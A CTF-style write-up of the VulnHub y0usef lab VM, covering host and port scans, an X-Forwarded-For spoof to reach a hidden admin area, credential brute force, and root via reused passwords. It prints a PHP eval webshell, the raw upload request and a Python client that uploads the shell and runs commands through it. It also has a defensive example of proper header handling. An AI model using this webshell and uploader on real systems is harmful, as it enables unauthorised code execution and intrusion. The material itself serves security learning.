Disclaimer: this post documents the solution of the y0usef penetration-testing VM; every action was carried out in a locally owned, authorised lab. The content is for security learning and defensive research only and must not be used for any illegal purpose. Readers must comply with the Cybersecurity Law and related regulations and help keep cyberspace secure.
Environment: https://download.vulnhub.com/y0usef/y0usef.ova
I. Information Gathering
1. Host discovery
ARP-based discovery only works when the attacking host sits on the same layer-2 segment as the target, so the scan is run from the Kali VM (192.168.5.11) on the same virtual network.
arp-scan -l
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1     0a:00:27:00:00:04       (Unknown: locally administered)
192.168.5.2     08:00:27:ce:48:4f       PCS Systemtechnik GmbH
192.168.5.13    08:00:27:58:85:88       PCS Systemtechnik GmbH

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.971 seconds (129.88 hosts/sec). 3 responded

Target IP: 192.168.5.13 (192.168.5.1 and .2 are the VirtualBox host-side addresses)
2. Port scan
nmap -sV -p- -A 192.168.5.13
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -A 192.168.5.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-20 07:18 -0500
Nmap scan report for 192.168.5.13
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
|   2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
|   256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_  256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:58:85:88 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.5.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds

Open ports: 22 (OpenSSH 6.6.1p1, Ubuntu 14.04 era) and 80 (Apache 2.4.10). Both versions are old, which already hints at an unpatched box.
3. Directory scan
dirsearch -u http://192.168.5.13
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.13
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.5.13/_26-02-20_07-19-43.txt

Target: http://192.168.5.13/

[07:19:43] Starting:
[07:19:45] 403 -  298B - /.ht_wsr.txt
[07:19:45] 403 -  301B - /.htaccess.orig
[07:19:45] 403 -  301B - /.htaccess.bak1
[07:19:45] 403 -  303B - /.htaccess.sample
[07:19:45] 403 -  301B - /.htaccess.save
[07:19:45] 403 -  302B - /.htaccess_extra
[07:19:45] 403 -  299B - /.htaccess_sc
[07:19:45] 403 -  299B - /.htaccessBAK
[07:19:45] 403 -  301B - /.htaccess_orig
[07:19:45] 403 -  299B - /.htaccessOLD
[07:19:45] 403 -  300B - /.htaccessOLD2
[07:19:45] 403 -  291B - /.htm
[07:19:45] 403 -  292B - /.html
[07:19:45] 403 -  301B - /.htpasswd_test
[07:19:45] 403 -  298B - /.httr-oauth
[07:19:45] 403 -  297B - /.htpasswds
[07:19:45] 403 -  291B - /.php
[07:19:45] 403 -  292B - /.php3
[07:19:52] 301 -  320B - /adminstration  ->  http://192.168.5.13/adminstration/
[07:20:13] 403 -  301B - /server-status/
[07:20:13] 403 -  300B - /server-status

Task Completed

The only interesting hit is /adminstration (note the misspelling; that is the real directory name). The 403s on .ht* files and /server-status are Apache's default deny rules, not findings.
dirb http://192.168.5.13 -X .php,.txt,.zip,.html
┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.13 -X .php,.txt,.zip,.html

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Feb 20 07:20:38 2026
URL_BASE: http://192.168.5.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.txt,.zip,.html) | (.php)(.txt)(.zip)(.html) [NUM = 4]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.5.13/ ----
+ http://192.168.5.13/index.php (CODE:200|SIZE:791)

-----------------
END_TIME: Fri Feb 20 07:20:42 2026
DOWNLOADED: 18448 - FOUND: 1

4. Technology fingerprinting
whatweb http://192.168.5.13
┌──(root㉿kali)-[~]
└─# whatweb http://192.168.5.13
http://192.168.5.13 [200 OK] Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.5.13], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]

The X-Powered-By header leaks the exact PHP build (5.5.9, long end-of-life); the site is a plain PHP application on Apache, not a known CMS.
II. Exploitation
For steps 1 to 3 below, every request has to be intercepted and given the spoofed local header; without it the admin area cannot be reached.
1. Accessing /adminstration
Intercept the request in Burp, add the header X-Forwarded-For: 127.0.0.1, then forward it. The application decides whether a request is "local" from this client-supplied header instead of from the real TCP peer address, so anyone who sets the header is treated as a request from the server itself.
2. Brute-forcing the login in Burp
Intercept the login request, add the same X-Forwarded-For: 127.0.0.1 header, and brute-force the credentials with Intruder.
admin/admin
Login successful.
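The page does not show the server-side code behind the X-Forwarded-For bypass. The following Python is an added example, not the box's code and not from the original writeup: it reconstructs the assumed access check (a "local only" gate that reads the client address from a header the client controls) next to a hardened version that only honours X-Forwarded-For from a known reverse proxy and then takes the rightmost hop that proxy appended. The attacker address 192.168.5.11 is the Kali host from the arp-scan output; the proxy address 10.0.0.5 and the client 203.0.113.9 are constructed for the demonstration, since the box has no proxy in front of it.

```python
# Added example, not code from the y0usef box or its author.
# Reconstructs the access-control flaw the X-Forwarded-For trick exploits.
import ipaddress

LOCAL_NETS = ["127.0.0.0/8"]


def _in_any(ip: str, networks) -> bool:
    """True if `ip` parses as an address and falls inside one of `networks`."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(n) for n in networks)


def client_ip_vulnerable(headers: dict, remote_addr: str) -> str:
    """Assumed behaviour of /adminstration: whoever sets X-Forwarded-For
    chooses the address the application sees."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()   # leftmost hop is client-supplied
    return remote_addr


def client_ip_hardened(headers: dict, remote_addr: str, trusted_proxies) -> str:
    """Use X-Forwarded-For only when the TCP peer is a proxy we operate, and
    then take the rightmost hop that is not one of our own proxies."""
    if not _in_any(remote_addr, trusted_proxies):
        return remote_addr  # direct connection: the header is just attacker input
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _in_any(hop, trusted_proxies):
            return hop
    return remote_addr


def admin_allowed(ip: str) -> bool:
    """The gate itself: the admin area is meant for loopback clients only."""
    return _in_any(ip, LOCAL_NETS)


ATTACKER = "192.168.5.11"                    # Kali host from the arp-scan output
SPOOFED = {"X-Forwarded-For": "127.0.0.1"}   # exactly the header added in Burp
TRUSTED = ["10.0.0.5/32"]                    # hypothetical reverse proxy (constructed)


def demo() -> dict:
    """Outcome of the same spoofed request against both checks."""
    return {
        "vulnerable": admin_allowed(client_ip_vulnerable(SPOOFED, ATTACKER)),
        "hardened": admin_allowed(client_ip_hardened(SPOOFED, ATTACKER, TRUSTED)),
        # Behind a real proxy the client can still prepend 127.0.0.1, but the
        # proxy appends the true peer on the right, and that is the hop used.
        "via_proxy": admin_allowed(client_ip_hardened(
            {"X-Forwarded-For": "127.0.0.1, 203.0.113.9"}, "10.0.0.5", TRUSTED)),
    }


if __name__ == "__main__":
    print(demo())   # {'vulnerable': True, 'hardened': False, 'via_proxy': False}
```

The fix is not "strip the header": a deployment that really is behind a load balancer needs it. The rule is to trust X-Forwarded-For only from the peer that is known to set it, and never to let a header decide loopback-level privileges at all.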
3. File upload
The admin area has an upload form. The file uploaded is a one-line PHP webshell that evaluates whatever arrives in the cmd parameter (GET, POST or cookie, since $_REQUEST merges all three):
<?php @eval($_REQUEST['cmd']); ?>
POST /adminstration/upload/ HTTP/1.1
Host: 192.168.5.13
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------58956059210588723155013980
Content-Length: 371
Origin: http://192.168.5.13
Connection: keep-alive
Referer: http://192.168.5.13/adminstration/upload/
Cookie: PHPSESSID=b4osh7tug1b8a383j3r0ovj532
Upgrade-Insecure-Requests: 1

-----------------------------58956059210588723155013980
Content-Disposition: form-data; name="document"; filename="cmd.php"
Content-Type: image/jpg

<?php @eval($_REQUEST['cmd']); ?>
-----------------------------58956059210588723155013980
Content-Disposition: form-data; name="submit"

Send
-----------------------------58956059210588723155013980--
Upload successful. The part's Content-Type was set to image/jpg, but the file keeps its .php name and is written to a web-reachable directory, with what looks like a Unix-timestamp prefix:
http://192.168.5.13/adminstration/upload/files/1771591543cmd.php
Requesting that URL with a cmd parameter (for example cmd=system('id');) runs the PHP inside the eval().
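The writeup shows the upload request and the resulting URL but not how the shell is driven afterwards. The following Python client is an added example, not part of the original writeup and not the box's code: it rebuilds the multipart body from the capture above, attaches the X-Forwarded-For header the admin area requires, and sends PHP to the eval() shell by POST so the code stays out of the access-log URL column. The form field names "document" and "submit", the cookie name PHPSESSID and the shell path are taken from the capture; the session id and the target values in the main block are placeholders. That the server checks only the part's Content-Type and not the extension is an assumption the successful upload suggests but the page does not confirm.

```python
# Added example, not code from the y0usef box or its author.
import urllib.parse
import urllib.request

BOUNDARY = "y0usefExampleBoundary"   # arbitrary; any string absent from the body works


def build_multipart(filename: str, content_type: str, data: bytes,
                    boundary: str = BOUNDARY) -> bytes:
    """Rebuild the body of the captured upload request: one file part named
    "document" plus the "submit" field, CRLF line endings as in the capture."""
    crlf = b"\r\n"
    parts = [
        b"--" + boundary.encode(),
        f'Content-Disposition: form-data; name="document"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),   # what the form claims, not what it is
        b"",
        data,
        b"--" + boundary.encode(),
        b'Content-Disposition: form-data; name="submit"',
        b"",
        b"Send",
        b"--" + boundary.encode() + b"--",
        b"",
    ]
    return crlf.join(parts)


def upload_request(base_url: str, session_id: str, filename: str,
                   content_type: str, data: bytes) -> urllib.request.Request:
    """Upload request with the admin session cookie and the spoofed local header."""
    body = build_multipart(filename, content_type, data)
    return urllib.request.Request(
        base_url.rstrip("/") + "/adminstration/upload/",
        data=body,
        method="POST",
        headers={
            "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
            "X-Forwarded-For": "127.0.0.1",
            "Cookie": f"PHPSESSID={session_id}",
        },
    )


def shell_php(command: str) -> str:
    """Wrap an OS command in PHP for the eval() shell. Backslashes and single
    quotes are escaped so the command cannot break out of the string literal."""
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    return f"echo shell_exec('{escaped}');"


def webshell_request(shell_url: str, php_code: str) -> urllib.request.Request:
    """POST the PHP in the cmd field; $_REQUEST picks it up like a GET parameter."""
    body = urllib.parse.urlencode({"cmd": php_code}).encode()
    return urllib.request.Request(
        shell_url, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def run(shell_url: str, command: str) -> str:
    """Execute one command through the webshell and return its output."""
    req = webshell_request(shell_url, shell_php(command))
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Placeholder values; the real session id comes from the admin login.
    target = "http://192.168.5.13"
    shell = target + "/adminstration/upload/files/1771591543cmd.php"
    print(run(shell, "id; ls -la /home/*"))
```

The escaping in shell_php only protects the PHP string literal; the command itself still goes to a shell, so keep quoting in mind when chaining commands.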
4. An encoded string in the home directory
Browsing the home directory through the webshell turns up a string that is base64-encoded (encoded, not encrypted):
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=
Base64-decoded it is three lines:
ssh :
user : yousef
pass : yousef123
5. SSH login
ssh yousef@192.168.5.13 (password yousef123), then id:
┌──(root㉿kali)-[~]
└─# ssh yousef@192.168.5.13
The authenticity of host '192.168.5.13 (192.168.5.13)' can't be established.
ED25519 key fingerprint is: SHA256:J3OrMiuy5X+zdlTAYCltBBCNaN3bxTjPbQvtPR6QSzE
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.13' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
yousef@192.168.5.13's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

778 packages can be updated.
482 updates are security updates.

Last login: Tue Dec  8 01:58:33 2020 from s
yousef@yousef-VirtualBox:~$ id
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
yousef@yousef-VirtualBox:~$
III. Privilege Escalation
1. Local privilege escalation
The id output shows that yousef is a member of the sudo group (27):
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
On a default Ubuntu install that group grants full sudo, so sudo -i with yousef's own password would already give a root shell. The writeup instead tries su root with the same password, and it works, which means root's password is also yousef123 (password reuse between the user account and root). Either route leads to root directly:
su root (password yousef123), then cd, id, ls, cat root.txt:

yousef@yousef-VirtualBox:~$ su root
Password:
root@yousef-VirtualBox:/home/yousef# cd
root@yousef-VirtualBox:~# id
uid=0(root) gid=0(root) groups=0(root)
root@yousef-VirtualBox:~# ls
root.txt
root@yousef-VirtualBox:~# cat root.txt
WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx
root@yousef-VirtualBox:~#
2. Base64 decoding of root.txt
You've got the root Congratulations any feedback content me twitter @y0usef_11
The techniques in this post apply only to authorised test environments or legitimate CTF events. Do not test any system without authorisation. The road to security starts with compliance and ends with responsibility.